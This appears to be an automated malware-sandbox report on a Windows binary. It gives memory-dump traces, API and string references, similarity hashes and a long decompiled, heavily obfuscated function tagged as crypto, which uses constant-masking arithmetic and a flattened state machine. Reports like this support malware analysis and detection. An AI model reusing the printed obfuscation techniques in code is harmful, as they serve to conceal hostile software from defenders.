0x6ed1f057
0x6ed1f060
0x6ed1f07c
0x6ed1e814
0x6ed1e814
0x6ed1e816
0x00000000
0x6ed1e816
0x6ed1e80e
0x6ed1e7f9
0x6ed1e79f
0x6ed1e7a3
0x6ed1eef2
0x6ed1eef2
0x6ed1eef6
0x6ed1eefb
0x6ed1eefe
0x6ed1ef03
0x6ed1ef09
0x6ed1ef13
0x6ed1ef1d
0x6ed1ef27
0x6ed1ef43
0x6ed1ef45
0x6ed1ef46
0x6ed1ef52
0x6ed1ef54
0x6ed1ef57
0x6ed1ef57
0x6ed1ef57
0x6ed1ef57
0x6ed1eefe
0x6ed1ef63
0x6ed1ef65
0x6ed1ef68
0x6ed1ef6b
0x6ed1ef6b
0x6ed1ef6b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed1e7a3
0x6ed1e7a9
0x6ed1e7a9
0x6ed1e7a9
0x6ed1ef6e
0x6ed1ef74
0x6ed1ef82
0x6ed1ef82

APIs

GetProcAddress.KERNEL32(SymFromAddrW), ref: 6ED1E806
GetCurrentProcess.KERNEL32 ref: 6ED1E81B

Strings

SymGetLineFromAddrW64, xrefs: 6ED1ED38
SymFromInlineContextW, xrefs: 6ED1EA8E
SymGetLineFromInlineContextW, xrefs: 6ED1EDE1
SymFromAddrW, xrefs: 6ED1E7FB
called `Option::unwrap()` on a `None` value, xrefs: 6ED1EFD5, 6ED1EFF8, 6ED1F01B, 6ED1F03E

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCurrentProcProcess
String ID: SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$called `Option::unwrap()` on a `None` value
API String ID: 3217270580-808744031
Opcode ID: 6864b3594b8501a6e006f931cfcb9b464874293e4969c408237c1ae45c7b2ecd
Instruction ID: 7c2c881caddf4c91a6a9b204e8f16d7317174d0332a8e90c33a49e26387a40f2
Opcode Fuzzy Hash: 6864b3594b8501a6e006f931cfcb9b464874293e4969c408237c1ae45c7b2ecd
Instruction Fuzzy Hash: C2425B70908B408FE7258F65D880BE3B7F1FF49314F10492DD99A87A50E775B586CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BCF561, Relevance: 21.9, Strings: 17, Instructions: 663
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00BCF561(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				void* _t761;
				void* _t763;
				void* _t772;
				void* _t780;
				intOrPtr _t792;
				void* _t795;
				signed int _t797;
				void* _t808;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t889;
				void* _t913;
				void* _t916;
				intOrPtr _t917;
				void* _t921;
				signed int* _t923;
				void* _t925;

				_t923 =  &_v392;
				_v200 = 0x89ca81;
				_v200 = _v200 * 0x5d;
				_t921 = 0;
				_v200 = _v200 ^ 0xaf9dd6ae;
				_t808 = 0xf774147;
				_v200 = _v200 ^ 0xd0d10238;
				_v340 = 0x7031b3;
				_v340 = _v340 << 9;
				_v340 = _v340 + 0xdab9;
				_v76 = __ecx;
				_t814 = 0x5e;
				_v340 = _v340 / _t814;
				_v340 = _v340 ^ 0x02631bed;
				_v344 = 0x913049;
				_v344 = _v344 >> 6;
				_v344 = _v344 + 0xffffeb40;
				_v344 = _v344 >> 9;
				_v344 = _v344 ^ 0x00000118;
				_v208 = 0xd820b3;
				_t815 = 0x11;
				_v208 = _v208 * 0x75;
				_v208 = _v208 / _t815;
				_v208 = _v208 ^ 0x05cf77a2;
				_v264 = 0x2d7b5a;
				_v264 = _v264 >> 3;
				_t816 = 0x60;
				_v264 = _v264 / _t816;
				_v264 = _v264 ^ 0x00000f29;
				_v228 = 0x9ea28;
				_v228 = _v228 >> 4;
				_v228 = _v228 << 3;
				_v228 = _v228 ^ 0x0004f510;
				_v212 = 0xfc5601;
				_t817 = 0x65;
				_v212 = _v212 * 0x23;
				_v212 = _v212 ^ 0x83bd7763;
				_v212 = _v212 ^ 0xa1c2b540;
				_v216 = 0xc9f780;
				_v216 = _v216 >> 0xd;
				_v216 = _v216 << 0xa;
				_v216 = _v216 ^ 0x00193c00;
				_v100 = 0xa15ef3;
				_v100 = _v100 + 0xcfb3;
				_v100 = _v100 ^ 0x00a22ea6;
				_v128 = 0x732cc;
				_v128 = _v128 ^ 0x331cc4bd;
				_v128 = _v128 ^ 0x331bf671;
				_v260 = 0x567154;
				_v260 = _v260 + 0x98f2;
				_v260 = _v260 | 0x07205bc1;
				_v260 = _v260 ^ 0x07775bc7;
				_v296 = 0xb824e0;
				_v296 = _v296 ^ 0x4344e171;
				_v296 = _v296 << 5;
				_v296 = _v296 << 9;
				_v296 = _v296 ^ 0x31644000;
				_v392 = 0xb375bd;
				_v392 = _v392 / _t817;
				_v392 = _v392 + 0x740b;
				_v392 = _v392 ^ 0x46953f20;
				_v392 = _v392 ^ 0x469705e9;
				_v380 = 0x6f0fc1;
				_v380 = _v380 + 0x682a;
				_v380 = _v380 << 0x10;
				_t818 = 0x35;
				_v380 = _v380 / _t818;
				_v380 = _v380 ^ 0x02448a90;
				_v232 = 0xb7f463;
				_v232 = _v232 >> 2;
				_t819 = 0x16;
				_v232 = _v232 / _t819;
				_v232 = _v232 ^ 0x000b0aa6;
				_v184 = 0x1e2afb;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0039344d;
				_v272 = 0xd60a24;
				_v272 = _v272 >> 0x10;
				_v272 = _v272 << 8;
				_v272 = _v272 ^ 0x0007d834;
				_v88 = 0xccda6;
				_v88 = _v88 | 0xd009f965;
				_v88 = _v88 ^ 0xd00eb16a;
				_v160 = 0x116f8;
				_v160 = _v160 << 1;
				_v160 = _v160 ^ 0x00010446;
				_v332 = 0xe14840;
				_v332 = _v332 + 0xe9af;
				_v332 = _v332 << 5;
				_t820 = 0x52;
				_v332 = _v332 * 5;
				_v332 = _v332 ^ 0x8d5f04ba;
				_v112 = 0x9b5594;
				_v112 = _v112 + 0x8c2;
				_v112 = _v112 ^ 0x009353c4;
				_v152 = 0xaad272;
				_v152 = _v152 + 0xa340;
				_v152 = _v152 ^ 0x00a74a81;
				_v224 = 0xfde353;
				_v224 = _v224 >> 0xd;
				_v224 = _v224 * 0x71;
				_v224 = _v224 ^ 0x0000f406;
				_v372 = 0x10fd3f;
				_v372 = _v372 / _t820;
				_v372 = _v372 * 0x26;
				_v372 = _v372 ^ 0x900c513e;
				_v372 = _v372 ^ 0x9009d373;
				_v192 = 0x9bc28f;
				_v192 = _v192 ^ 0x8daa98a9;
				_v192 = _v192 >> 2;
				_v192 = _v192 ^ 0x234acdcf;
				_v256 = 0x6a542c;
				_v256 = _v256 << 6;
				_v256 = _v256 + 0xcf70;
				_v256 = _v256 ^ 0x1a90167c;
				_v308 = 0xb0ac3a;
				_v308 = _v308 + 0xffff0ba4;
				_v308 = _v308 >> 7;
				_v308 = _v308 ^ 0x7a292cfc;
				_v308 = _v308 ^ 0x7a298d34;
				_v352 = 0x7fa15;
				_v352 = _v352 << 8;
				_v352 = _v352 + 0x42c8;
				_v352 = _v352 ^ 0x420546d7;
				_v352 = _v352 ^ 0x45f279ac;
				_v172 = 0x3c10dc;
				_v172 = _v172 + 0x934c;
				_v172 = _v172 ^ 0x003c5902;
				_v252 = 0x8e9148;
				_t821 = 0x3d;
				_v252 = _v252 * 0x15;
				_v252 = _v252 >> 8;
				_v252 = _v252 ^ 0x0000fb60;
				_v164 = 0x57b7bf;
				_v164 = _v164 * 0x65;
				_v164 = _v164 ^ 0x2299a995;
				_v336 = 0xdc0eaf;
				_v336 = _v336 << 3;
				_v336 = _v336 + 0xdead;
				_v336 = _v336 + 0x5890;
				_v336 = _v336 ^ 0x06efbc16;
				_v148 = 0x5f891c;
				_v148 = _v148 + 0xe952;
				_v148 = _v148 ^ 0x00699f2d;
				_v156 = 0xb9bdf1;
				_v156 = _v156 * 0x30;
				_v156 = _v156 ^ 0x22d92b94;
				_v328 = 0xdd275a;
				_v328 = _v328 ^ 0xf9c8fd87;
				_v328 = _v328 | 0xb4ffffed;
				_v328 = _v328 ^ 0xfdf2704c;
				_v220 = 0xdc69da;
				_v220 = _v220 / _t821;
				_v220 = _v220 ^ 0xf70c1774;
				_v220 = _v220 ^ 0xf706e836;
				_v236 = 0xe3f700;
				_v236 = _v236 << 6;
				_v236 = _v236 | 0x5d8b8659;
				_v236 = _v236 ^ 0x7dfec952;
				_v132 = 0xe887ef;
				_t822 = 7;
				_v132 = _v132 / _t822;
				_v132 = _v132 ^ 0x0024c858;
				_v140 = 0xc58056;
				_v140 = _v140 >> 5;
				_v140 = _v140 ^ 0x0004a47e;
				_v244 = 0x7835a9;
				_v244 = _v244 >> 5;
				_v244 = _v244 + 0xffff434e;
				_v244 = _v244 ^ 0x000b19d5;
				_v124 = 0x628bac;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x000d99ba;
				_v196 = 0x3c4d43;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x3d5f35f5;
				_v196 = _v196 ^ 0x2e03dce1;
				_v204 = 0x3d8ce2;
				_v204 = _v204 + 0x9c91;
				_v204 = _v204 ^ 0x7a1df218;
				_v204 = _v204 ^ 0x7a210bc9;
				_v188 = 0x2b0ddf;
				_v188 = _v188 >> 0xe;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x00037781;
				_v312 = 0x266488;
				_t823 = 0x3c;
				_v312 = _v312 / _t823;
				_v312 = _v312 >> 2;
				_v312 = _v312 + 0xffff0572;
				_v312 = _v312 ^ 0xffff9b33;
				_v320 = 0xbcf7b8;
				_t824 = 0x39;
				_v320 = _v320 * 0x6b;
				_v320 = _v320 * 0x26;
				_v320 = _v320 / _t824;
				_v320 = _v320 ^ 0x034e55e7;
				_v364 = 0xfcda34;
				_v364 = _v364 + 0xdb03;
				_v364 = _v364 >> 6;
				_v364 = _v364 + 0xabad;
				_v364 = _v364 ^ 0x000f61ab;
				_v92 = 0x2a2b0e;
				_v92 = _v92 + 0x4979;
				_v92 = _v92 ^ 0x0021c920;
				_v144 = 0xa1e216;
				_v144 = _v144 + 0xffff5ff5;
				_v144 = _v144 ^ 0x00ad0a84;
				_v356 = 0xcae231;
				_v356 = _v356 >> 0xc;
				_v356 = _v356 | 0xfd8e10ca;
				_t825 = 0x72;
				_v356 = _v356 * 0x5c;
				_v356 = _v356 ^ 0x1f1c568f;
				_v324 = 0x253eae;
				_v324 = _v324 >> 2;
				_v324 = _v324 | 0xf8fd8aec;
				_v324 = _v324 + 0x754e;
				_v324 = _v324 ^ 0xf8f18caa;
				_v240 = 0xb94b94;
				_v240 = _v240 + 0xffff03b1;
				_v240 = _v240 + 0xc1ea;
				_v240 = _v240 ^ 0x00b636b6;
				_v248 = 0x665da;
				_v248 = _v248 / _t825;
				_v248 = _v248 ^ 0xe7146895;
				_v248 = _v248 ^ 0xe71d8416;
				_v136 = 0xf03201;
				_v136 = _v136 | 0x16662734;
				_v136 = _v136 ^ 0x16f8276c;
				_v348 = 0xf58dc;
				_v348 = _v348 | 0xcefb25f5;
				_v348 = _v348 ^ 0xb79d248d;
				_v348 = _v348 * 5;
				_v348 = _v348 ^ 0x5ee99df0;
				_v292 = 0x1bda;
				_v292 = _v292 ^ 0xf0c300cc;
				_v292 = _v292 | 0x62eaa242;
				_v292 = _v292 ^ 0x0fb5f6bf;
				_v292 = _v292 ^ 0xfd545b0a;
				_v388 = 0x7e987;
				_v388 = _v388 | 0xe51d24f3;
				_v388 = _v388 << 1;
				_v388 = _v388 | 0xd459dc12;
				_v388 = _v388 ^ 0xde72c5d1;
				_v168 = 0x6f1542;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 ^ 0x00095e82;
				_v316 = 0xeb0c05;
				_v316 = _v316 * 0x34;
				_v316 = _v316 ^ 0x9a011e6d;
				_v316 = _v316 + 0xffffdd41;
				_v316 = _v316 ^ 0xb5bd4b4c;
				_v108 = 0x4384da;
				_v108 = _v108 << 7;
				_v108 = _v108 ^ 0x21ca9036;
				_v376 = 0x26f029;
				_v376 = _v376 | 0x5c3fc44f;
				_v376 = _v376 * 0x5e;
				_v376 = _v376 << 0xa;
				_v376 = _v376 ^ 0xef0e7155;
				_v120 = 0xfb00c8;
				_t826 = 0x70;
				_v120 = _v120 / _t826;
				_v120 = _v120 ^ 0x0007bcc6;
				_v104 = 0x83a54a;
				_v104 = _v104 + 0xffff432b;
				_v104 = _v104 ^ 0x008e71dd;
				_v384 = 0x2ff4f3;
				_v384 = _v384 | 0xd0f2a060;
				_v384 = _v384 << 0xc;
				_t827 = 0x63;
				_v384 = _v384 * 0x15;
				_v384 = _v384 ^ 0xf17b8b1a;
				_v284 = 0x7bc7d6;
				_v284 = _v284 | 0xfb469b5d;
				_v284 = _v284 >> 0x10;
				_v284 = _v284 ^ 0x000029d1;
				_v276 = 0xc7b492;
				_v276 = _v276 ^ 0xda7fe355;
				_v276 = _v276 ^ 0xf789276a;
				_v276 = _v276 ^ 0x2d34b316;
				_v280 = 0xc4b066;
				_v280 = _v280 + 0x2d4a;
				_v280 = _v280 ^ 0x79b35fac;
				_v280 = _v280 ^ 0x79759ff7;
				_v360 = 0x6bdb51;
				_v360 = _v360 << 4;
				_v360 = _v360 >> 7;
				_v360 = _v360 / _t827;
				_v360 = _v360 ^ 0x0009f0c5;
				_v180 = 0xdedf2a;
				_t828 = 0x4a;
				_v180 = _v180 * 0x51;
				_v180 = _v180 ^ 0x46824d47;
				_v368 = 0xc3e69e;
				_v368 = _v368 + 0xffff984d;
				_v368 = _v368 * 0x6d;
				_v368 = _v368 * 0x79;
				_v368 = _v368 ^ 0x57d87162;
				_v300 = 0x54bd4a;
				_v300 = _v300 | 0xb63244a0;
				_v300 = _v300 + 0x417e;
				_v300 = _v300 | 0x63a11be6;
				_v300 = _v300 ^ 0xf7f931f3;
				_v268 = 0xbea848;
				_v268 = _v268 >> 9;
				_v268 = _v268 | 0x5eb62668;
				_v268 = _v268 ^ 0x5eb9ee94;
				_v96 = 0x440258;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x0009723b;
				_v176 = 0x3b19f4;
				_v176 = _v176 / _t828;
				_v176 = _v176 ^ 0x0001c2c1;
				_v116 = 0x144365;
				_v116 = _v116 | 0x65ecb7a2;
				_v116 = _v116 ^ 0x65f0ee99;
				_v288 = 0xea5434;
				_v288 = _v288 >> 1;
				_v288 = _v288 | 0xb6140203;
				_v288 = _v288 >> 9;
				_v288 = _v288 ^ 0x0050b8a2;
				_v304 = 0x566331;
				_t916 = 0x8e3f5ae;
				_v304 = _v304 >> 4;
				_t913 = 0xf1618c3;
				_v304 = _v304 >> 9;
				_v304 = _v304 >> 5;
				_v304 = _v304 ^ 0x000acbce;
				_v72 = 0x20;
				while(1) {
					L1:
					_t829 = 0xfce4db5;
					_t761 = 0x8c7d07e;
					_t889 = 0x74c5c61;
					do {
						while(1) {
							L2:
							_t925 = _t808 - _t916;
							if(_t925 <= 0) {
								break;
							}
							__eflags = _t808 - _t913;
							if(_t808 == _t913) {
								E00BB2CF9(_v116, _v288, _v296, _v304, _v84);
								_t923 =  &(_t923[3]);
								_t808 = 0x3abff5b;
								goto L24;
							} else {
								__eflags = _t808 - 0xf774147;
								if(__eflags == 0) {
									_t808 = 0x77e61bb;
									continue;
								} else {
									__eflags = _t808 - _t829;
									if(__eflags == 0) {
										_push(0xbb1648);
										_t917 = E00BD0AD3(_v352, _v172, __eflags);
										 *_t923 = 0xbb1678;
										_t795 = E00BD0AD3(_v252, _v164, __eflags);
										_v64 = _v344;
										_t797 = E00BBF14F(_v336, _t917, _v148, _v156);
										_v56 = _v56 & 0x00000000;
										_v60 = _t917;
										_v52 = 1;
										_v68 = 2 + _t797 * 2;
										_v48 =  &_v68;
										_v80 = _v72;
										__eflags = E00BB386E(_v328,  &_v80, _v220, _v228, _v236,  &_v32, _v132,  &_v56, _v76, _v140, _v244, _v72, _t795) - _v212;
										_t808 =  ==  ? 0x74c5c61 : 0xf1618c3;
										E00BC2EED(_v124, _v196, _v204, _t917);
										_t923 =  &(_t923[0x10]);
										E00BC2EED(_v188, _v312, _v320, _t795);
										L11:
										_t913 = 0xf1618c3;
										L12:
										_t916 = 0x8e3f5ae;
										L24:
										_t761 = 0x8c7d07e;
										_t829 = 0xfce4db5;
										_t889 = 0x74c5c61;
									}
								}
							}
							goto L25;
						}
						if(_t925 == 0) {
							_t763 = E00BD0AD3(_v316, _v108, __eflags);
							_t832 = 0xbb1708;
							_t918 = _t763;
							_v44 = _v200;
							_v40 = _v340;
							_v36 = _v392;
							_t772 = E00BCC50B(_v376, _v84,  *((intOrPtr*)( *0xbd5be0 + 0xc)), _t832, _v120, _v104,  *0xbd5be0 + 0x70, _t832, _v128,  &_v44,  *((intOrPtr*)( *0xbd5be0 + 8)), _v384, _t763, _v284, _v276, _v280);
							_t923 =  &(_t923[0xe]);
							__eflags = _t772 - _v260;
							if(_t772 != _v260) {
								_t808 = 0x88fbe98;
							} else {
								_t808 = _t913;
								_t921 = 1;
							}
							E00BC2EED(_v360, _v180, _v368, _t918);
							goto L12;
						} else {
							if(_t808 == _t889) {
								_push(0xbb1618);
								__eflags = E00BB5894(_v144,  *0xbd5be0 + 0xc, _v356,  &_v80, _v324, _v240, E00BD0AD3(_v364, _v92, __eflags), _v216, _v248, _v84) - _v100;
								_t808 =  ==  ? 0x8c7d07e : _t913;
								E00BC2EED(_v136, _v348, _v292, _t774);
								_t923 =  &(_t923[0xb]);
								goto L12;
							} else {
								if(_t808 == 0x77e61bb) {
									_push(0xbb1738);
									_t780 = E00BD0AD3(_v380, _v232, __eflags);
									 *_t923 = 0xbb15c8;
									__eflags = E00BB92DD(_t780, _v208, _v88,  &_v84, E00BD0AD3(_v184, _v272, __eflags), _v160, _v332, _v112) - _v264;
									_t808 =  ==  ? 0xfce4db5 : 0x3abff5b;
									E00BC2EED(_v152, _v224, _v372, _t780);
									E00BC2EED(_v192, _v256, _v308, _t781);
									_t923 =  &(_t923[0xb]);
									goto L11;
								} else {
									if(_t808 == 0x88fbe98) {
										E00BBF699(_v300,  *((intOrPtr*)( *0xbd5be0 + 8)), _v268, _v96, _v176);
										_t923 =  &(_t923[3]);
										_t808 = _t913;
										goto L1;
									} else {
										if(_t808 == _t761) {
											_push(_t829);
											_t792 = E00BC6F53( *((intOrPtr*)( *0xbd5be0 + 0xc)));
											_t808 =  !=  ? _t916 : _t913;
											 *((intOrPtr*)( *0xbd5be0 + 8)) = _t792;
											while(1) {
												L1:
												_t829 = 0xfce4db5;
												_t761 = 0x8c7d07e;
												_t889 = 0x74c5c61;
												goto L2;
											}
										}
									}
								}
							}
						}
						L25:
						__eflags = _t808 - 0x3abff5b;
					} while (__eflags != 0);
					return _t921;
				}
			}

0x00bcf561
0x00bcf567
0x00bcf580
0x00bcf587
0x00bcf589
0x00bcf594
0x00bcf599
0x00bcf5a4
0x00bcf5ac
0x00bcf5b1
0x00bcf5bf
0x00bcf5c6
0x00bcf5cb
0x00bcf5d1
0x00bcf5d9
0x00bcf5e1
0x00bcf5e6
0x00bcf5ee
0x00bcf5f3
0x00bcf5fb
0x00bcf60e
0x00bcf611
0x00bcf623
0x00bcf62a
0x00bcf635
0x00bcf640
0x00bcf64f
0x00bcf654
0x00bcf65d
0x00bcf668
0x00bcf673
0x00bcf67b
0x00bcf683
0x00bcf68e
0x00bcf6a1
0x00bcf6a2
0x00bcf6a9
0x00bcf6b4
0x00bcf6bf
0x00bcf6ca
0x00bcf6d2
0x00bcf6da
0x00bcf6e5
0x00bcf6f0
0x00bcf6fb
0x00bcf706
0x00bcf711
0x00bcf71c
0x00bcf727
0x00bcf732
0x00bcf73d
0x00bcf748
0x00bcf753
0x00bcf75b
0x00bcf763
0x00bcf768
0x00bcf76d
0x00bcf775
0x00bcf783
0x00bcf787
0x00bcf791
0x00bcf799
0x00bcf7a1
0x00bcf7a9
0x00bcf7b1
0x00bcf7bc
0x00bcf7c1
0x00bcf7c7
0x00bcf7cf
0x00bcf7da
0x00bcf7e9
0x00bcf7ee
0x00bcf7f7
0x00bcf802
0x00bcf80d
0x00bcf814
0x00bcf81f
0x00bcf82a
0x00bcf832
0x00bcf83a
0x00bcf845
0x00bcf850
0x00bcf85b
0x00bcf866
0x00bcf871
0x00bcf878
0x00bcf883
0x00bcf88b
0x00bcf893
0x00bcf89d
0x00bcf89e
0x00bcf8a2
0x00bcf8aa
0x00bcf8b5
0x00bcf8c0
0x00bcf8cb
0x00bcf8d6
0x00bcf8e1
0x00bcf8ec
0x00bcf8f7
0x00bcf907
0x00bcf90e
0x00bcf919
0x00bcf927
0x00bcf930
0x00bcf934
0x00bcf93c
0x00bcf944
0x00bcf94f
0x00bcf95a
0x00bcf962
0x00bcf96d
0x00bcf978
0x00bcf980
0x00bcf98b
0x00bcf996
0x00bcf99e
0x00bcf9a6
0x00bcf9ab
0x00bcf9b3
0x00bcf9bb
0x00bcf9c3
0x00bcf9c8
0x00bcf9d0
0x00bcf9d8
0x00bcf9e0
0x00bcf9ed
0x00bcf9f8
0x00bcfa03
0x00bcfa18
0x00bcfa1b
0x00bcfa22
0x00bcfa2a
0x00bcfa35
0x00bcfa48
0x00bcfa4f
0x00bcfa5a
0x00bcfa62
0x00bcfa67
0x00bcfa6f
0x00bcfa77
0x00bcfa7f
0x00bcfa8a
0x00bcfa95
0x00bcfaa0
0x00bcfab3
0x00bcfaba
0x00bcfac5
0x00bcfacd
0x00bcfad5
0x00bcfadd
0x00bcfae5
0x00bcfafb
0x00bcfb02
0x00bcfb0d
0x00bcfb18
0x00bcfb23
0x00bcfb2b
0x00bcfb36
0x00bcfb41
0x00bcfb53
0x00bcfb58
0x00bcfb61
0x00bcfb6c
0x00bcfb77
0x00bcfb7f
0x00bcfb8a
0x00bcfb95
0x00bcfb9d
0x00bcfba8
0x00bcfbb3
0x00bcfbbe
0x00bcfbc6
0x00bcfbd1
0x00bcfbdc
0x00bcfbe4
0x00bcfbef
0x00bcfbfa
0x00bcfc05
0x00bcfc10
0x00bcfc1b
0x00bcfc26
0x00bcfc31
0x00bcfc39
0x00bcfc41
0x00bcfc4c
0x00bcfc58
0x00bcfc5b
0x00bcfc5f
0x00bcfc64
0x00bcfc6c
0x00bcfc74
0x00bcfc85
0x00bcfc88
0x00bcfc91
0x00bcfc9d
0x00bcfca1
0x00bcfca9
0x00bcfcb1
0x00bcfcb9
0x00bcfcbe
0x00bcfcc6
0x00bcfcce
0x00bcfcd9
0x00bcfce4
0x00bcfcef
0x00bcfcfa
0x00bcfd05
0x00bcfd10
0x00bcfd18
0x00bcfd1d
0x00bcfd2a
0x00bcfd2b
0x00bcfd2f
0x00bcfd37
0x00bcfd3f
0x00bcfd44
0x00bcfd4c
0x00bcfd54
0x00bcfd5c
0x00bcfd67
0x00bcfd72
0x00bcfd7d
0x00bcfd88
0x00bcfd9c
0x00bcfda3
0x00bcfdae
0x00bcfdb9
0x00bcfdc4
0x00bcfdcf
0x00bcfdda
0x00bcfde2
0x00bcfdea
0x00bcfdf7
0x00bcfdfb
0x00bcfe03
0x00bcfe0b
0x00bcfe13
0x00bcfe1b
0x00bcfe23
0x00bcfe2b
0x00bcfe33
0x00bcfe3b
0x00bcfe3f
0x00bcfe47
0x00bcfe4f
0x00bcfe5a
0x00bcfe62
0x00bcfe6d
0x00bcfe7a
0x00bcfe7e
0x00bcfe86
0x00bcfe8e
0x00bcfe96
0x00bcfea1
0x00bcfea9
0x00bcfeb4
0x00bcfebc
0x00bcfec9
0x00bcfecf
0x00bcfed4
0x00bcfedc
0x00bcfef0
0x00bcfef5
0x00bcfefe
0x00bcff09
0x00bcff14
0x00bcff1f
0x00bcff2a
0x00bcff32
0x00bcff3a
0x00bcff44
0x00bcff47
0x00bcff4b
0x00bcff53
0x00bcff5e
0x00bcff69
0x00bcff71
0x00bcff7c
0x00bcff87
0x00bcff92
0x00bcff9d
0x00bcffa8
0x00bcffb3
0x00bcffbe
0x00bcffc9
0x00bcffd4
0x00bcffdc
0x00bcffe1
0x00bcffee
0x00bcfff2
0x00bcfffa
0x00bd000d
0x00bd000e
0x00bd0015
0x00bd0020
0x00bd0028
0x00bd0035
0x00bd003e
0x00bd0042
0x00bd004a
0x00bd0052
0x00bd005a
0x00bd0062
0x00bd006a
0x00bd0072
0x00bd007d
0x00bd0085
0x00bd0090
0x00bd009b
0x00bd00a6
0x00bd00ae
0x00bd00b9
0x00bd00cd
0x00bd00d4
0x00bd00df
0x00bd00ea
0x00bd00f5
0x00bd0100
0x00bd0108
0x00bd010c
0x00bd0114
0x00bd0119
0x00bd0121
0x00bd0129
0x00bd012e
0x00bd0133
0x00bd0138
0x00bd013d
0x00bd0142
0x00bd014a
0x00bd0155
0x00bd0155
0x00bd0155
0x00bd015a
0x00bd015f
0x00bd0164
0x00bd0164
0x00bd0164
0x00bd0164
0x00bd0166
0x00000000
0x00000000
0x00bd0411
0x00bd0413
0x00bd0597
0x00bd059c
0x00bd059f
0x00000000
0x00bd0419
0x00bd0419
0x00bd041f
0x00bd0570
0x00000000
0x00bd0425
0x00bd0425
0x00bd0427
0x00bd0438
0x00bd0449
0x00bd0452
0x00bd0459
0x00bd046d
0x00bd047f
0x00bd0485
0x00bd0494
0x00bd04a2
0x00bd04ad
0x00bd04bb
0x00bd04d1
0x00bd052c
0x00bd0549
0x00bd054c
0x00bd0551
0x00bd0564
0x00bd02a2
0x00bd02a2
0x00bd02a7
0x00bd02a7
0x00bd05a4
0x00bd05a4
0x00bd05a9
0x00bd05ae
0x00bd05ae
0x00bd0427
0x00bd041f
0x00000000
0x00bd0413
0x00bd016c
0x00bd034f
0x00bd0354
0x00bd0355
0x00bd035e
0x00bd0369
0x00bd037b
0x00bd03d8
0x00bd03dd
0x00bd03e0
0x00bd03e7
0x00bd03f0
0x00bd03e9
0x00bd03eb
0x00bd03ed
0x00bd03ed
0x00bd0405
0x00000000
0x00bd0172
0x00bd0174
0x00bd02bc
0x00bd0315
0x00bd032f
0x00bd0332
0x00bd0337
0x00000000
0x00bd017a
0x00bd0180
0x00bd01fc
0x00bd0201
0x00bd0216
0x00bd0262
0x00bd027c
0x00bd027f
0x00bd029a
0x00bd029f
0x00000000
0x00bd0182
0x00bd0188
0x00bd01e2
0x00bd01e7
0x00bd01ea
0x00000000
0x00bd018a
0x00bd018c
0x00bd01a3
0x00bd01a7
0x00bd01b8
0x00bd01bb
0x00bd0155
0x00bd0155
0x00bd0155
0x00bd015a
0x00bd015f
0x00000000
0x00bd015f
0x00bd0155
0x00bd018c
0x00bd0188
0x00bd0180
0x00bd0174
0x00bd05b3
0x00bd05b3
0x00bd05b3
0x00bd05cb
0x00bd05cb

Strings

TqV, xrefs: 00BCF727
;r, xrefs: 00BD00AE
(, xrefs: 00BCF668
@H, xrefs: 00BCF883
~A, xrefs: 00BD005A
yI, xrefs: 00BCFCD9
1cV, xrefs: 00BD0121
,Tj, xrefs: 00BCF96D
*h, xrefs: 00BCF7A9
J-, xrefs: 00BCFFB3
Nu, xrefs: 00BCFD4C
4T, xrefs: 00BD0100
M49, xrefs: 00BCF814
qDC, xrefs: 00BCF75B
R, xrefs: 00BCFA8A
CM<, xrefs: 00BCFBD1
, xrefs: 00BD014A

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
